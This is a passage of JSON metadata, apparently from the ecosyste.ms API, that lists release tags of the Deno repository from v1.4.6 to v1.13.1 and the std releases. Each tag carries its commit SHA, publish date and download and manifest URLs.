oland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T